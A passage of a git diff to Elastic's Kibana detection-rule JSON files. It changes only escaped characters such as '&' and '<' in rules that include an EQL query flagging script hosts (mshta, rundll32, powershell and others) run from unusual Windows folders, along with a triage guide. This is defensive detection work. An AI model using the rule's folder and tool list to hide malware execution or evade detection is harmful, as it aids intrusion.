@@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_203.json b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_203.json index efb2eede579..e48790249ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_203.json +++ b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_203.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_204.json b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_204.json index c941eb8cb76..a13fea2ff0a 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_204.json +++ b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_204.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_205.json b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_205.json index e5216dbe66c..48cb9860088 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_205.json +++ b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_205.json 
@@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cf575427-0839-4c69-a9e6-99fde02606f3_1.json b/packages/security_detection_engine/kibana/security_rule/cf575427-0839-4c69-a9e6-99fde02606f3_1.json index 6e179998210..24e191eeec0 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf575427-0839-4c69-a9e6-99fde02606f3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/cf575427-0839-4c69-a9e6-99fde02606f3_1.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_1.json b/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_1.json index abf26e97a70..4dd2e474fb2 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_1.json +++ b/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_1.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_105.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_105.json index cb61ea7f42f..6d600adad93 100644 --- a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_105.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using 
the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. 
Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n 
\"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : 
\"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_106.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_106.json
index 1b421122e4a..d1e3730dc56 100644
--- a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. 
Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, 
pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to 
reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n 
\"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n 
\"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
